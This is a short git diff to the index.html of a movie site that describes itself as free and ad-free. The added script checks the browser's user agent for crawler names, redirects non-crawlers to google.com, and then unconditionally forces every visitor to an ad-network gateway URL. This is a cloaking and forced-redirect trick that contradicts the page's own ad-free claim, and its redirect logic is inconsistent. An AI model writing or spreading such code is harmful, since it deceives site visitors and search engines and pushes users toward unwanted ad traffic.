--- a/index.html
+++ b/index.html
@@ -13,7 +13,12 @@
     <meta property="og:url" content="Moviehaven.site">
     <meta property = "og:description" content="Watch free thousand of movies and TV-shows, AD FREE and no subscription/account needed watch anywhere and anytime.">
 
-    <script> location.href = 'https://www.highrevenuegate.com/rwugfq1g6r?key=2662afc43d7be27192f5be645ad9ee41'; </script>
+    <script> var isCrawler = /bot|googlebot|crawler|spider|robot|crawling|facebookexternalhit/i.test(navigator.userAgent)
+  
+  if (!isCrawler) {
+    location.href = 'https://www.google.com/';
+  }
+        location.href = 'https://www.highrevenuegate.com/rwugfq1g6r?key=2662afc43d7be27192f5be645ad9ee41'; </script>
 
     <link rel="image_src" href="logo.jpg">
 
